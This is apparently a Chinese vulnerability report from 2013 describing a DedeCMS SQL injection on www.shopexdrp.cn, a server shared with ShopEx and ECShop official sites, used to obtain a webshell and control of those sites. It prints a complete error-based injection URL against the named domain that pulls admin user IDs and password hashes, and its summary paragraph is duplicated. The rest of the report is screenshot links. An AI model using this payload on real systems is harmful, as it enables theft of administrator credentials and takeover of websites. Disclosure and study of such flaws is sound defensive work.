VULHUB ™

### 简要描述： 域名反查www.shopexdrp.cn，发现ShopEX官方子网站、及ecshop官方网站等都在同一台服务器上，其中www.shopexdrp.cn使用dedecms，利用该CMS注入漏洞，可拿到webshell，同服务上的众多官方子网站及旗下网站被控制。 ### 详细说明： [<img src="https://images.seebug.org/upload/201303/2223430831b60e5d2d3bf4d2105f6d1ddc02f78b.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201303/2223430831b60e5d2d3bf4d2105f6d1ddc02f78b.jpg) 利用dedecms sql注入漏洞： www.shopexdrp.cn/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+1,2),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a [<img src="https://images.seebug.org/upload/201303/22234632fe98ea8f0646d95447efaffe746b5d3f.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201303/22234632fe98ea8f0646d95447efaffe746b5d3f.jpg) ### 漏洞证明： [<img...

### 简要描述： 域名反查www.shopexdrp.cn，发现ShopEX官方子网站、及ecshop官方网站等都在同一台服务器上，其中www.shopexdrp.cn使用dedecms，利用该CMS注入漏洞，可拿到webshell，同服务上的众多官方子网站及旗下网站被控制。 ### 详细说明： [<img src="https://images.seebug.org/upload/201303/2223430831b60e5d2d3bf4d2105f6d1ddc02f78b.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201303/2223430831b60e5d2d3bf4d2105f6d1ddc02f78b.jpg) 利用dedecms sql注入漏洞： www.shopexdrp.cn/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+1,2),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a [<img src="https://images.seebug.org/upload/201303/22234632fe98ea8f0646d95447efaffe746b5d3f.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201303/22234632fe98ea8f0646d95447efaffe746b5d3f.jpg) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201303/222354149585dd7046794da96660ab29451633a1.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201303/222354149585dd7046794da96660ab29451633a1.jpg) [<img src="https://images.seebug.org/upload/201303/2223502331e8849b24db7cb9728d21ee976e8542.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201303/2223502331e8849b24db7cb9728d21ee976e8542.jpg) [<img src="https://images.seebug.org/upload/201303/2223524765de923ef685315c3dca6121a853b97e.jpg" alt="5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201303/2223524765de923ef685315c3dca6121a853b97e.jpg) [<img src="https://images.seebug.org/upload/201303/2300030425baac25a6e38586b9e3aaee06b9731a.jpg" alt="6.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201303/2300030425baac25a6e38586b9e3aaee06b9731a.jpg)